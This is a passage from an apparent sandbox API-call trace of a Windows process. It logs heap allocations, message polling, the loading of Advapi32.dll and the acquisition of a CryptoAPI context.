| out: hHeap=0x970000) returned 1 [0266.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0266.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.710] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0266.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.710] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0266.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0266.710] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0266.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0266.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0266.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0266.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0266.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0266.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0266.711] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0266.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0266.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0266.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0266.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0266.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0266.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0266.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0266.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0266.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0266.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.711] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0266.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0266.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0266.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.712] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0266.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.712] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0266.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0266.712] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0266.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0266.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0266.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0266.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0266.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0266.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0266.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0266.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0266.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0266.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0266.713] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0266.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0266.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.713] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0266.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0266.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0266.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.722] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0266.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0266.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0266.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0266.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0266.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0266.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.722] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0266.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0266.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0266.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.723] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0266.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0266.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.724] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.724] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.724] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0266.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0266.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0266.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0266.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.726] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0266.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0266.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0266.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0266.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0266.728] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0266.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0266.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0266.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0266.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69ba8 [0266.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69ba8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0266.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0266.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0266.729] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0266.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0266.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0266.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0266.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0266.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0266.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0266.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0266.731] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0266.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0266.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0266.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0266.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0266.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0266.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 